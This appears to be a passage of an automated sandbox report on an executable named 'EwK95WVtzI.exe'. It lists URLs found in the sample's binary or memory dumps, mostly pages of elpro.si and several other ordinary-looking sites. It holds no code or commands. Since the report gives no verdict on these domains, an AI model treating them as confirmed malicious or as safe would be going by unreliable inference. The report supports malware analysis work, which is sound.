                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.GPSENKE.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aiag.org/about
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1843966184.0000000007788000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1480772092.0000000007E80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1930606016.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2785021069.0000000007780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1487245514.0000000008980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#/schema/logo/image/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#breadcrumb
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#organization
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#primaryimage
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#website
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/?s=
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/avtorji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/category/aktualno/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/disclaimer/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/elpro-laboratorij-za-kalibracije/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/en/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/el-pro-set4/
